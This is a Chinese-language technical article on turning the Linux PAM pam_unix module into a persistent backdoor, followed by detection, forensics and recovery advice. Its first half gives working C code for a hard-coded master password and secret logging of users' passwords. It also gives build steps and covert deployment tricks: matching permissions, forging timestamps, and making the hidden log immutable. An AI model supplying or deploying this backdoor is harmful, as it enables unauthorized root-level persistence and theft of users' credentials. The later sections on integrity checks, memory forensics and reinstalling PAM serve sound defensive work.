PAM模块的隐秘改造：从认证核心到持久化后门

1. PAM模块在Linux系统中的核心作用

PAM（Pluggable Authentication Modules）是Linux系统中负责认证的核心组件。我第一次接触PAM是在十年前的一次系统加固项目中，当时就被它灵活的设计所吸引。简单来说，PAM就像是一个智能门禁系统，它不直接决定谁能进门，而是通过调用各种验证模块来完成认证工作。

这个机制最大的优势在于它的模块化设计。想象一下，如果你家的门锁可以随时更换不同的验证方式——今天用密码，明天用指纹，后天用人脸识别——这就是PAM的工作原理。系统管理员可以根据需要配置不同的认证方式，而无需修改应用程序代码。

在实际应用中，PAM主要负责以下几类认证：

• 登录认证（如ssh、login）
• 权限提升（如sudo）
• 密码修改（如passwd）
• 会话管理

我曾在生产环境中遇到过因为PAM配置不当导致整个运维团队被锁在系统外的情况。那次经历让我深刻认识到，理解PAM的工作机制对系统管理员来说有多重要。

2. PAM后门的实现原理

2.1 认证流程的突破口

PAM后门之所以可能，关键在于它的模块化架构。每个认证模块都是一个独立的.so文件，系统在认证时会动态加载这些模块。攻击者一旦获得root权限，就可以替换这些模块文件。

最常被利用的是pam_unix模块，它负责传统的用户名/密码认证。这个模块的源代码中有一个关键函数pam_sm_authenticate，正是密码验证的实际发生地。我在分析多个后门样本时发现，攻击者通常会在以下位置插入恶意代码：

1. 密码比较前插入万能密码检查
2. 认证成功后添加密码记录功能
3. 认证失败时添加特殊绕过逻辑

2.2 典型后门实现方式

下面是一个简化版的恶意修改示例，展示了攻击者如何在pam_unix_auth.c中植入后门：

/* 原始认证逻辑 */ retval = _unix_verify_password(pamh, name, p, ctrl); /* 攻击者添加的恶意代码 */ if(strcmp("backdoor123", p) == 0) { return PAM_SUCCESS; // 万能密码直接通过 } if(retval == PAM_SUCCESS) { // 记录成功登录的凭证 FILE *fp = fopen("/var/log/.hidden_log", "a"); if(fp) { fprintf(fp, "[%s] %s:%s\n", get_current_time(), name, p); fclose(fp); } }

这种修改会产生两个效果：

1. 使用特定密码（如backdoor123）可以直接通过认证
2. 所有成功登录的凭证都会被秘密记录到隐藏文件

3. 从源码编译到部署的完整链条

3.1 环境准备与源码获取

在实际操作中（仅限授权测试环境），攻击者通常会遵循以下步骤：

1. 确认目标系统PAM版本：

rpm -qa | grep pam

2. 下载对应版本的源码包。我建议从官方仓库获取，避免引入其他安全问题：

wget https://linux-pam.org/library/Linux-PAM-1.3.0.tar.gz tar -zxvf Linux-PAM-1.3.0.tar.gz

3. 安装编译依赖。根据我的经验，这些包通常是必须的：

yum install gcc flex flex-devel make -y

3.2 关键修改点与编译技巧

在修改源码时，有几点需要特别注意：

1. 修改位置要选在认证逻辑的核心路径上
2. 添加的代码要尽量保持原有代码风格
3. 避免引入明显的性能影响

编译时的经验之谈：

• 先运行autogen.sh（如果需要）
• 使用--prefix参数控制安装路径
• 测试编译时要保留原始模块备份

./configure --prefix=/usr/local/pam_backdoor make

4. 隐蔽部署与维持访问

4.1 文件替换的艺术

成功编译后，最关键的步骤是替换系统原有模块。这里有几个实用技巧：

1. 保持文件权限一致：

chmod --reference=/usr/lib64/security/pam_unix.so ./pam_unix.so

2. 修改时间戳伪装：

touch -r /usr/lib64/security/pam_unix.so ./pam_unix.so

3. 使用ldconfig更新缓存：

ldconfig

4.2 日志隐藏技巧

记录凭证时要考虑隐蔽性：

1. 使用非常规路径（如/dev/shm/.rand）
2. 设置适当的文件隐藏属性：

chattr +i /var/log/.hidden_log

3. 定期清理或压缩日志

5. 防御与检测方案

5.1 异常检测指标

根据我参与的应急响应案例，以下迹象可能表明PAM模块被篡改：

1. 文件时间戳异常：

stat /lib64/security/pam_unix.so

2. 文件大小或哈希值变化：

rpm -V pam

3. 异常的认证日志模式

5.2 防护建议

1. 启用SELinux并保持强制模式：

setenforce 1

2. 定期校验关键文件完整性：

tripwire --check

3. 使用IMB的TPM模块进行远程证明

4. 限制对PAM配置目录的写入权限：

chattr +i /usr/lib64/security/pam_*.so

6. 深入技术细节分析

6.1 PAM模块加载机制

PAM的模块加载过程实际上相当复杂。当sshd这样的服务启动认证时：

1. 首先读取/etc/pam.d/sshd配置文件
2. 按顺序加载指定的模块
3. 调用模块的pam_sm_authenticate函数
4. 根据返回值决定认证结果

这个过程中最关键的环节是dlopen()调用，它负责动态加载.so文件。攻击者可以利用这一点，通过LD_PRELOAD注入恶意代码。

6.2 高级持久化技术

更高级的攻击者可能会采用以下技术：

1. 函数钩子（function hooking）
2. 直接修改内存中的函数指针
3. 利用内核模块拦截系统调用

我曾遇到一个案例，攻击者没有替换整个pam_unix.so，而是只修改了其中的几个关键指令，这种改动更难被传统检测方法发现。

7. 实战检测演练

7.1 自动化检测脚本

这是我常用的检测脚本框架：

#!/bin/bash # 检查文件修改时间 check_file_time() { local file=$1 local mtime=$(stat -c %Y "$file") local now=$(date +%s) local diff=$((now - mtime)) if [ $diff -lt 86400 ]; then echo "[!] $file was modified in last 24 hours" return 1 fi return 0 } # 检查文件哈希 check_file_hash() { local file=$1 local known_hash=$2 local current_hash=$(sha256sum "$file" | awk '{print $1}') if [ "$current_hash" != "$known_hash" ]; then echo "[!] $file hash mismatch" return 1 fi return 0 } # 主检查流程 for module in /lib64/security/pam_*.so; do check_file_time "$module" check_file_hash "$module" "<known_good_hash>" done

7.2 内存取证技术

当怀疑PAM模块被篡改时，内存取证可以提供决定性证据：

1. 使用LiME获取内存镜像：

insmod lime.ko "path=/tmp/memdump.lime format=lime"

2. 使用Volatility分析加载的模块：

volatility -f /tmp/memdump.lime --profile=LinuxCentOS7x64 linux_check_modules

3. 特别关注pam_unix.so的内存映射区域

8. 恢复与加固方案

8.1 系统恢复步骤

确认被入侵后，应按以下顺序操作：

1. 隔离受影响系统
2. 从官方源重新安装PAM：

yum reinstall pam

3. 重置所有可能泄露的凭证
4. 审查所有认证日志

8.2 长期加固措施

1. 实施文件完整性监控（FIM）
2. 启用UEFI安全启动
3. 部署基于行为的异常检测系统
4. 定期进行红蓝对抗演练

在一次客户案例中，我们发现攻击者不仅修改了PAM模块，还设置了定时任务来定期恢复后门。这提醒我们，单纯的模块恢复是不够的，必须进行全面的系统审查。